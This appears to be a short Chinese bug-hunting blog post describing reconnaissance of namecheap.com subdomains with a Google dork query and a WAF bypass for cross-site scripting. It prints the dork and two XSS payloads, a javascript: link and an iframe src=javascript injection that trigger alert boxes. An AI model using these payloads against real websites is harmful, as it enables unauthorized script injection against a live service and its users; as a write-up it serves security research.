今天的主题是关于如何绕过XSS过滤。我已经观察目标网站很久了,并且一直在尝试利用谷歌语法试图发现网站的子域名,大家也可以尝试一下。好不容易找到几个子域,正当我尝试XSS注入的时候,却被防火墙各种蹂躏
site:*.*.namecheap.com & site:*.namecheap.com
虽然痛不欲生,但我是那种会放弃的人吗?经过多方面的尝试之后,终于发现了一种莫名其妙的编码方式能够绕过防火墙
<a href="javascript:alert(document.domain)">Click Here</a> "><iframe/src=javascript:[document.domain].find(alert(1))> 视屏 [*]xss-1 [*]xss-2